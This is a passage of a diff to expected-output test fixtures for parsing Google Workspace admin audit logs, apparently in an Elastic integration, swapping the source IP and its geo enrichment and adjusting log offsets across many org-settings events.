"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_CREATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", "event.provider": "admin", "event.type": [ "creation" 
@@ -77,26 +73,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 472, + "log.offset": 471, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -117,7 +109,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_DELETED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_DELETED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", "event.provider": "admin", "event.type": [ "deletion" 
@@ -131,26 +123,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 982, + "log.offset": 980, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -171,7 +159,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -187,26 +175,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 1457, + "log.offset": 1454, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -227,7 +211,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}", "event.provider": "admin", "event.type": [ "creation" 
@@ -239,26 +223,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 2002, + "log.offset": 1998, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -279,7 +259,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"ASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"ASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -291,26 +271,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 2400, + "log.offset": 2395, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -331,7 +307,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"UNASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"UNASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -343,26 +319,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 2771, + "log.offset": 2765, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -383,7 +355,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "event.provider": "admin", "event.type": [ "creation" 
@@ -395,26 +367,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 3144, + "log.offset": 3137, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -435,7 +403,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -447,26 +415,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 3520, + "log.offset": 3512, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -487,7 +451,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ALLOWED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ALLOWED\",\"value\":\"EMPTY\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ALLOWED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ALLOWED\",\"value\":\"EMPTY\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -501,26 +465,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 3896, + "log.offset": 3887, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -541,7 +501,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "event.provider": "admin", "event.type": [ "creation" 
@@ -553,26 +513,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 4365, + "log.offset": 4355, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -593,7 +549,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REMOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REMOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "event.provider": "admin", "event.type": [ "deletion" 
@@ -605,26 +561,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 4733, + "log.offset": 4722, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -645,7 +597,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_DESCRIPTION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_DESCRIPTION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -657,26 +609,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 5101, + "log.offset": 5089, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -697,7 +645,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"MOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"MOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -710,26 +658,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 5479, + "log.offset": 5466, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + 